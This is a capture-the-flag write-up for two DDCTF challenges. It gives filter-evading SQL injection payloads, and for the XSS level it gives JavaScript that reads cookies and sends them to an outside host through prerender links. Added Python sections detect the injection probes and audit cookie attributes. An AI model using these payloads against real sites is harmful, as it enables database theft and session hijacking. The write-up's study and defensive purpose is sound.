
DDCTF

I only solved two challenges, but I learned a lot, especially from the second one (XSS), which I basically started from zero.
I had hardly touched XSS before, and now I finally have some idea of how it works.

level 5

http://118.190.134.8/t1/news.php?id=4
Numeric SQL injection.
Spaces are filtered; %0d%0a (i.e. Tab) gets around the filter.

?id=1 order by 4

4 columns.
Database name length: 2.
Here I found that commas are filtered too, so I used the substr(... from 1 for 1) form to get around that.

?id=4 and ascii(substr(database() from 1 for 1))=68

Database name: t1
Table name length: 4
Table name: news (0x6e657773)
group_concat() joins all the results into one string.

?id=4 and ascii (substr((select group_concat(column_name) from information_schema.columns where table_name=0x6e657773 limit 1)from 1 for 1))=97#

Column names: id title content secret
"secret" is filtered.
Subquery trick, see this article: http://115.159.210.46/archives/3.html
payload:

?id=-1 union select * from ((select 1)h join (select flag from(select * from ((SELECT 1 as e)a JOIN (SELECT 2 as f)b JOIN (SELECT 3 as g)c JOIN (SELECT 4 as flag)d) where 1=2 union select * from news where id = 4) as total)i join (select 3)j join (select 4)k)

flag:flag{DDCTF-88458a95f96c4dfea359d1de2b03bbdb@didichuxing.com}
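From the defender's side, the lesson of level 5 is that a keyword blacklist on spaces and commas is not a control: the probes still arrive, only with CR/LF in place of the space and substr(... from n for m) in place of the comma. The following detection routine is an added example, not part of this writeup; it URL-decodes the query string, collapses the whitespace substitutes MySQL accepts, and matches a small signature list of my own choosing. The access-log lines are constructed for the example and carry the same probes as above, encoded the way a browser actually sends them.

```python
# Added detection example (not part of the writeup): flag SQL injection
# probes that evade a naive space/comma filter, as seen in level 5, by
# normalising the query string before matching.  The log lines below are
# constructed for this example; the signature list is my own choice.
import re
from urllib.parse import unquote_plus, urlsplit

# Token separators that MySQL accepts in place of a literal space:
# CR/LF (%0d%0a), tab, vertical tab, form feed, NBSP and inline comments.
_WS_SUBSTITUTES = re.compile(r"/\*.*?\*/|[\r\n\t\x0b\x0c\xa0]+")

# Signatures evaluated against the normalised (decoded, single-spaced,
# lower-cased) query string.  Dict order defines the report order.
_SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "boolean_ascii_probe": re.compile(r"\bascii\s*\(\s*substr\s*\("),
    # substr(x FROM n FOR m): the comma-free form used when ',' is filtered
    "comma_free_substr": re.compile(r"\bsubstr\s*\(.*?\bfrom\s+\d+\s+for\s+\d+\s*\)"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "union_select": re.compile(r"\bunion\s+select\b"),
}

_REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalise_query(raw_query: str) -> str:
    """URL-decode (twice, for double-encoded payloads), collapse whitespace
    substitutes to a single space and lower-case the result."""
    decoded = unquote_plus(unquote_plus(raw_query))
    decoded = _WS_SUBSTITUTES.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify_request(log_line: str) -> dict:
    """Return the matched signature names for one access-log line and whether
    the request used whitespace substitutes instead of literal spaces."""
    m = _REQUEST_LINE.search(log_line)
    if not m:
        return {"path": None, "findings": [], "evasion": False}
    parts = urlsplit(m.group(1))
    decoded_once = unquote_plus(parts.query)
    norm = normalise_query(parts.query)
    findings = [name for name, rx in _SIGNATURES.items() if rx.search(norm)]
    # Evasion: SQL keywords present, yet the decoded query carried no real space.
    evasion = bool(findings) and " " not in decoded_once
    return {"path": parts.path, "findings": findings, "evasion": evasion}


def scan_log(lines) -> list:
    """Return (line_index, findings, evasion) for every suspicious line."""
    out = []
    for i, line in enumerate(lines):
        r = classify_request(line)
        if r["findings"]:
            out.append((i, r["findings"], r["evasion"]))
    return out


# Constructed sample log (combined format); the payloads mirror level 5,
# sent with %0d%0a in place of spaces as the browser would transmit them.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Apr/2018:10:00:01 +0800] "GET /t1/news.php?id=4 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [21/Apr/2018:10:00:05 +0800] "GET /t1/news.php?id=1%0d%0aorder%0d%0aby%0d%0a4 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [21/Apr/2018:10:00:09 +0800] "GET /t1/news.php?id=4%0d%0aand%0d%0aascii(substr(database()%0d%0afrom%0d%0a1%0d%0afor%0d%0a1))=68 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [21/Apr/2018:10:00:12 +0800] "GET /t1/news.php?id=4%0d%0aand%0d%0aascii(substr((select%0d%0agroup_concat(column_name)%0d%0afrom%0d%0ainformation_schema.columns%0d%0awhere%0d%0atable_name=0x6e657773%0d%0alimit%0d%0a1)%0d%0afrom%0d%0a1%0d%0afor%0d%0a1))=97%23 HTTP/1.1" 200 1532',
]

if __name__ == "__main__":
    for idx, findings, evasion in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {findings} evasion={evasion}")
```

The evasion flag is the useful signal: a request whose decoded query contains SQL keywords but not a single literal space is almost never a legitimate client. The real fix is on the server side (a prepared statement for the id parameter), and the detector is there to catch the probing that a blacklist silently lets through.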

level 7

CSP:default-src 'self'; script-src 'self'
I wrote a PHP script to solve the verification check:

<?php
// Brute-force the verification value: find a number whose md5 hash
// contains 'f774af' at offset 6
for($a = 0; $a < 100000000; $a++) {
    if (substr(md5($a),6,6)==='f774af') {
        echo $a;
        break;
    }
}
?>

First I tried: <link rel="prefetch" href="http://123.206.203.108/1.php">
In the headers I received, I found
Referer:http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=e2125cd687d5ae52e3f068839c9376ef
Then I posted some random text plus the link. Opening the address from the Referer showed the content of my message, and that content is under my control, so I now had a same-origin page whose content I control.
Continuing:

// Payload placed in the controllable same-origin message page: read the
// visitor's cookie and carry it out through a prerender link
window.onload=function(){
    var a = document.cookie;
    var b = document.createElement("link");
    b.setAttribute("rel", "prerender");
    b.setAttribute("href", "http://123.206.203.108/1.php?a=" + a);
    document.head.appendChild(b);
}
//<link rel="prerender" href="http://123.206.203.108/1.php">

Then submit again:

"><script type="text/javascript" src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=80963aba031a8158586ad9dd72abffdd"></script>

The cookie obtained was

hit=c2V0Y29va2llKCJmbGFnIiwgImZsYWd7eHh4eHh4eHh4eHh4eHh4eH0iLCB0aW1lKCkrMzYwMDAwMDAsICIvdDIvZjFhZ18xc19oM3IzIik7

After base64-decoding it, the flag turns out to be at /t2/f1ag_1s_h3r3/
So, continuing, write in:

// Load the flag path in a same-origin iframe so its path-scoped cookie
// becomes readable, then carry it out the same way as before
var iframe = document.createElement('iframe');
iframe.src = "http://114.215.24.14/t2/f1ag_1s_h3r3/index.php";
document.body.appendChild(iframe);
iframe.onload=function(){
    var a = iframe.contentWindow.document.cookie;
    var b = document.createElement("link");
    b.setAttribute("rel", "prerender");
    b.setAttribute("href", "http://123.206.203.108/1.php?a=" + a);
    document.head.appendChild(b);
}
//<link rel="prerender" href="http://123.206.203.108/1.php">

Then

">"<script type="text/javascript" src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=80963aba031a8158586ad9dd72abffdd"></script>
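Two things made level 7 work once a same-origin page was under control: the flag cookie was readable from document.cookie, and scoping it to the path /t2/f1ag_1s_h3r3 did not help, because a same-origin iframe pointed at that path exposes it. Both are properties of the Set-Cookie header the server sends, so they can be audited in responses. The script below is an added example, not part of the writeup; the response headers are constructed for it, with the flag cookie written the way a setcookie() call with only name, value, expiry and path would issue it (no HttpOnly, no Secure, no SameSite), which is what the successful document.cookie read above implies.

```python
# Added defender-side example (not from the writeup): audit Set-Cookie
# headers for the attributes whose absence made the level 7 cookie
# readable by script.  Sample headers are constructed for this example.
from dataclasses import dataclass, field


@dataclass
class CookieAudit:
    name: str
    path: str
    missing: list = field(default_factory=list)   # absent protective attributes
    notes: list = field(default_factory=list)     # human-readable findings


def parse_set_cookie(header: str) -> tuple:
    """Split one Set-Cookie header into (name, value, {attr: value}).
    Attribute names are lower-cased; flag attributes map to ''."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header: str) -> CookieAudit:
    """Report missing HttpOnly / Secure / SameSite, and call out path scoping
    that is being relied on as if it were an isolation boundary."""
    name, _, attrs = parse_set_cookie(header)
    path = attrs.get("path", "/")
    result = CookieAudit(name=name, path=path)
    if "httponly" not in attrs:
        result.missing.append("HttpOnly")
        result.notes.append("readable via document.cookie by any script on the origin")
    if "secure" not in attrs:
        result.missing.append("Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        result.missing.append("SameSite")
    if path != "/" and "httponly" not in attrs:
        # Path is not a security boundary: a same-origin frame loading this
        # path can read the cookie through contentWindow.document.cookie.
        result.notes.append("path-scoped but script-readable; a same-origin frame exposes it")
    return result


def audit_headers(headers) -> list:
    """Audit every Set-Cookie line in a list of raw response header lines."""
    return [audit_cookie(h) for h in headers if h.lower().startswith("set-cookie:")]


# Constructed sample response; the first cookie mirrors how a setcookie()
# call with only name, value, expiry and path would be sent.
SAMPLE_RESPONSE_HEADERS = [
    "HTTP/1.1 200 OK",
    "Content-Security-Policy: default-src 'self'; script-src 'self'",
    "Set-Cookie: flag=flag%7BEXAMPLE-PLACEHOLDER%7D; expires=Sat, 13-Apr-2019 00:00:00 GMT; path=/t2/f1ag_1s_h3r3",
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    for audit in audit_headers(SAMPLE_RESPONSE_HEADERS):
        print(f"{audit.name} (path {audit.path}): missing {audit.missing}")
        for note in audit.notes:
            print("  -", note)
```

The writeup also shows why the CSP header did not help: script-src 'self' still trusts every same-origin response, and the message page reflected attacker-controlled text that could be loaded as a script, while the prefetch and prerender links carried the cookie out without being stopped by default-src 'self'. HttpOnly on the flag cookie would have removed the value the payload was reading in the first place.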
Tags: CTF